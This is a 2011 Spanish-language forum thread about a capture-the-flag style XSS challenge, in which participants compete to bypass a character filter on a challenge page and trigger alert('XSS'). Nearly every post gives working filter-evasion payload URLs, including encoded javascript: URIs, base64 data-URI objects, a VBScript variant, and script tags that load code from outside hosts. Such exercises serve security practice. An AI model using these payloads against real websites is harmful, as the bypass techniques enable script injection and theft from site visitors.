Autor Tema: [RETO] Salta el filtro y ejecuta javascript  (Leído 7714 veces)

0 Usuarios y 1 Visitante están viendo este tema.

tr3w

  • Mensajes: 7
  • Liked: 0
[RETO] Salta el filtro y ejecuta javascript
« : febrero 21, 2011, 08:45:50 pm »
Esta sección del foro está muy muerta y podría ser muy divertida con más aportaciones, así que hice un reto simple para revivir un poco la atención aquí y para que practiquen sus habilidades. Veamos que tal funciona. El reto está algo sencillo pero divertido, dependiendo de la participación de la gente posiblemente ponga retos de mayor difícultad en el futuro.

¿Dónde está?
http://tr3w.net/misc/challenges/ch1.php

¿Qué hay que hacer?
La página tiene un "agujero" de XSS y un filtro que prohibe introducir varios caracteres. Debes encontrar el XSS y saltar el filtro para poder ejecutar javascript:

Reglas
1. Debes ejecutar un alert box que contenga el texto "XSS" ( alert("XSS") ).
2. El alert debe contener únicamente el texto "XSS", sin espacios, ni diagonales, ni puntos, ni nadamás, únicamente esas 3 letras.

Mándame la URL con tu(s) solución(es) por un mensaje privado o email (tr3w@tr3w.net). Si quieres, también puedes postear aquí tu solución, sólo que te arriesgas que alguien la vea y encuentre una forma de hacerla más corta y te gane. (Aunque eso podría hacer más divertido esto xD.)

El ganador será quien tenga la solución más corta y/o ingeniosa. El domingo 27 de feb nombraré a los 3 primeros lugares y mostraré sus soluciones. En caso de no recibir suficientes soluciones antes del 27, extenderé la fecha límite una semana mas. En caso de no recibir suficientes soluciones en dos semanas, cerraré el reto xD.

Suerte.  ;)

PD: Puede que el filtro tenga algunos bugs inesperados, si encuentro alguno lo corregiré y lo notificaré en este post.

tr3w

  • Mensajes: 7
  • Liked: 0
Leaderboard
« Respuesta #1 : febrero 22, 2011, 10:54:55 pm »
Los ganadores

-- UPDATE -- (Mar 01, 01:20)

1er Lugar: LightOS
Payload de 31 bytes, logró quitarle un byte a la entrada de hkm. El payload solo funciona en FF pero como en las reglas no es un requisito que el payload funcione en varios navegadores, es completamente válido.
http://tr3w.net/misc/challenges/ch1.php?blabla=a%A0setter=alert,a=/XSS/.source

2do Lugar: hkm
Payload de 32 bytes, léase arriba xD
http://tr3w.net/misc/challenges/ch1.php?blabla=a/**/setter=alert,a=/XSS/.source

3er Lugar: Diego Boy
Payload de 60 bytes, está chido porque hace uso de la cadena 'alert("XSS")' presente en el cuerpo de la página.
http://tr3w.net/misc/challenges/ch1.php?blabla=location.href=/javascript:/.source%2Bdocument.all[8].innerHTML

Yo obtuve una solución de 45 bytes que funciona en todos los browsers, pero pues como yo hice el reto, mi payload no cuenta para el Leaderboard xD:
http://tr3w.net/misc/challenges/ch1.php?blabla=location=%26quot;javascript:alert\50\42XSS\42\51%26quot


Algunos otras soluciones interesantes:

Lo puso hkm pero creo que LightOS fue quien se lo dio, no requiere interacción del usuario y funciona en varios browsers:
http://tr3w.net/misc/challenges/ch1.php?blabla=%3E%3Cobject/data=data:html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4

Este otro funciona en Safari y en Chrome y no requiere interacción del usuario:
http://tr3w.net/misc/challenges/ch1.php?blabla=><script/src=\\hak.im/x></script




« Última Modificación: marzo 01, 2011, 11:15:57 am por tr3w »

hkm

  • Moderador
  • *
  • Mensajes: 1244
  • Liked: 286
    • Hakim.Ws

LightOS

  • Mensajes: 5
  • Liked: 0

hkm

  • Moderador
  • *
  • Mensajes: 1244
  • Liked: 286
    • Hakim.Ws
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #4 : febrero 24, 2011, 09:06:23 pm »

Diego_Boy

  • Mensajes: 4
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #5 : febrero 24, 2011, 09:07:11 pm »
Código: [Seleccionar]
http://tr3w.net/misc/challenges/ch1.php?blabla=location.href=/javasc/.source%2B/ript:/.source%2Bdocument.all[8].innerHTML

Este es un poquito mas largo pero funciona en todos.
« Última Modificación: febrero 24, 2011, 09:12:35 pm por hkm »

hkm

  • Moderador
  • *
  • Mensajes: 1244
  • Liked: 286
    • Hakim.Ws
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #6 : febrero 24, 2011, 09:18:53 pm »
Código: [Seleccionar]
http://tr3w.net/misc/challenges/ch1.php?blabla=location.href=/javasc/.source%2B/ript:/.source%2Bdocument.all[8].innerHTML

Este es un poquito mas largo pero funciona en todos.

Sniped! :P:

Código: [Seleccionar]
http://tr3w.net/misc/challenges/ch1.php?blabla=location=/javascript:/.source%2Bdocument.all[8].innerHTML
« Última Modificación: febrero 24, 2011, 09:23:29 pm por hkm »

Diego_Boy

  • Mensajes: 4
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #7 : febrero 24, 2011, 09:32:28 pm »
Ooops lo siento!  ;D

tr3w

  • Mensajes: 7
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #8 : febrero 25, 2011, 06:19:21 pm »
43 chars y funciona en varios browsers:

http://tr3w.net/misc/challenges/ch1.php?blabla=location=%26quot;javascript:alert\50\42XSS\42\51%26quot

LightOS me lo snipeo en el MSN, en el original hacía esto: \050\042XSS\042\051, no sabia que podias representar octales sin usar ceros hehe.



« Última Modificación: febrero 25, 2011, 06:23:30 pm por tr3w »

hkm

  • Moderador
  • *
  • Mensajes: 1244
  • Liked: 286
    • Hakim.Ws
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #9 : febrero 26, 2011, 01:50:57 pm »
y unos más largos...

57 chars (con location=name):
<iframe name=javascript:alert('XSS'); src=http://tr3w.net/misc/challenges/ch1.php?blabla=location=name>

72 chars (con data uri en base64):
http://tr3w.net/misc/challenges/ch1.php?blabla=%3E%3Cobject/data=data:html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

Y este último aún no logro que funcione bien, es para IE:
http://tr3w.net/misc/challenges/ch1.php?blabla=vbs:MsgBox[]

Diego_Boy

  • Mensajes: 4
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #10 : febrero 26, 2011, 03:17:17 pm »
Código: [Seleccionar]
http://tr3w.net/misc/challenges/ch1.php?blabla=location=%26quot;javas+cript:alert\50\42XSS\42\51%26quot

Funciona en todos y no le afecta el anti-XSS de IE

LightOS

  • Mensajes: 5
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #11 : febrero 26, 2011, 06:33:38 pm »
Y este último aún no logro que funcione bien, es para IE:
http://tr3w.net/misc/challenges/ch1.php?blabla=vbs:MsgBox[]

Te falto que alerte XSS para el utlimo :P pero pues que raro que todavia no te funcione.
http://tr3w.net/misc/challenges/ch1.php?blabla=vbs:MsgBox%2b%26quot;XSS%26quot

Diego_Boy

  • Mensajes: 4
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #12 : febrero 27, 2011, 03:34:59 am »
Código: [Seleccionar]
http://tr3w.net/misc/challenges/ch1.php?blabla=location=/java+script:/.source%2Bdocument.all[8].innerHTML

Igual para todos, más el anti-XSS de IE.

tr3w

  • Mensajes: 7
  • Liked: 0
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #13 : marzo 01, 2011, 02:05:38 am »
Ya hice la actualización final de los ganadores. Sólo hubo 3 participantes, espero que en los siguientes retos más gente se anime a entrar.

Ahorita acabo de encontrar esta solución de 33 chars que funciona en Safari y en Chrome:

http://tr3w.net/misc/challenges/ch1.php?blabla=><script/src=\\tr3w.net/x></script




hkm

  • Moderador
  • *
  • Mensajes: 1244
  • Liked: 286
    • Hakim.Ws
Re: [RETO] Salta el filtro y ejecuta javascript
« Respuesta #14 : marzo 01, 2011, 11:04:52 am »
Es de 34 chars ese ultimo que pusiste tr3w.
Ahorita acabo de encontrar esta solución de 33 chars que funciona en Safari y en Chrome:

http://tr3w.net/misc/challenges/ch1.php?blabla=><script/src=\\tr3w.net/x></script

y SniPEd!..

32 chars Muahahhaa :P
http://tr3w.net/misc/challenges/ch1.php?blabla=><script/src=\\hak.im/x></script